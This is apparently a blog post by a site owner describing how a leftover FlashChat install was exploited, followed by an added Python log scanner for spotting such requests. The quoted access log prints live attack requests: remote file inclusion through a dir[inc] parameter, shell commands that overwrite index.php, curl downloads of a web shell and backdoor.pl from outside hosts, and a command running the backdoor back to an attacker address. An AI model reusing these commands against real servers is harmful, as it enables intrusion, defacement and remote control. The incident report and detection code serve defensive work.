
FlashChat v 4.5.7 is prone to being hacked

I woke up and went straight online… opened the website… huh? What? Why has it been hacked? Ugh, hacked again?
It was not too serious, though: only the contents of the index.php file had been replaced with "q8". Googling for information about q8 turned up nothing clear. Too many things use the name q8. On the Joomla website itself only 2 people had run into a problem like this, but they had not yet found the cause or any solution other than replacing index.php with the original file.

Then I tried checking the log file through the hosting cPanel, and I did find the culprit. Suspected: IPs 62.150.154.69 and 213.219.122.11. This guy found a leftover FlashChat folder in an old directory, from back when I was trying out FlashChat.

Log file:

/chat/appdata/.h.php HTTP/1.1″ 500 - “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html;echo%20q8%20>%20index.php HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/ HTTP/1.1″ 200 15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/ HTTP/1.1″ 200 15 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;curl%20-o%20./r57.txt%20http://www.terradibari.it/chat/.jr7/r57.txt;mv%20r57.txt%20.h.php;ls%20-la HTTP/1.1″ 200 1808 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;curl%20-o%20./backdoor.pl%20http://www.terradibari.it/chat/.jr7/backdoor.pl;ls%20-la HTTP/1.1″ 200 1945 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;chmod%20777%20backdoor.pl;perl%20backdoor.pl%2062.150.154.69%202121 HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gulflobby.com/lobby/upload/cR.txt?&cmd=cd%20/home/websiteku/public_html/forum/chat/appdata;perl%20backdoor.pl%2062.150.154.69%202121 HTTP/1.1″ 200 783 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/ HTTP/1.0″ 200 3 “-” “Wget/1.9.1″

/ HTTP/1.1″ 200 15 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,Dr.jr7″ “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”

/index.php HTTP/1.1″ 200 15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”
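
An added example, not part of the original post: a small Python scan for access-log requests shaped like the ones above, where one query parameter (here dir[inc]) carries a remote URL and cmd carries shell commands. The function names and the sample log lines are constructed for illustration, with placeholder hosts, addresses and paths.

```python
import re
from urllib.parse import unquote_plus

# Request target up to the protocol token. Matches full combined-format
# lines and fragments that start at the path, like those in the post.
TARGET_RE = re.compile(r'(/\S*) HTTP/\d\.\d')
# Parameter value that points at a remote resource.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def inspect_line(line):
    """Return a finding dict for a request carrying a remote URL in a
    query parameter, or None. A hit is a lead to review, not a verdict:
    legitimate redirect parameters also match."""
    m = TARGET_RE.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition('?')
    params = []
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        params.append((unquote_plus(key), unquote_plus(value)))
    remote = [(k, v) for k, v in params if REMOTE_RE.match(v)]
    if not remote:
        return None
    # "cmd" is the parameter name seen in the post's log; its decoded
    # value tells the responder which dropped files to look for.
    commands = [c.strip() for k, v in params if k == 'cmd'
                for c in v.split(';') if c.strip()]
    return {'path': path, 'remote_params': remote, 'commands': commands}

def scan(lines):
    """Return (line_number, finding) for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        finding = inspect_line(line)
        if finding:
            hits.append((n, finding))
    return hits

# Constructed sample lines (placeholder hosts, addresses and paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2008:06:00:01 +0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://files.example.test/x.txt?&cmd=cd%20/home/user/public_html;ls%20-la HTTP/1.1" 200 783 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [01/Jan/2008:06:00:05 +0700] "GET /index.php?page=2&ref=home HTTP/1.1" 200 1500 "-" "Mozilla/4.0"',
    '/forum/view.php?next=/chat/index.php HTTP/1.1" 200 90 "-" "Wget/1.9.1"',
]

if __name__ == '__main__':
    for n, f in scan(SAMPLE_LOG):
        print(n, f['path'], f['remote_params'], f['commands'])
```

Run over a real log, the decoded commands give the working directory and the names of any files written there, which is the list to check and clean up on disk.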
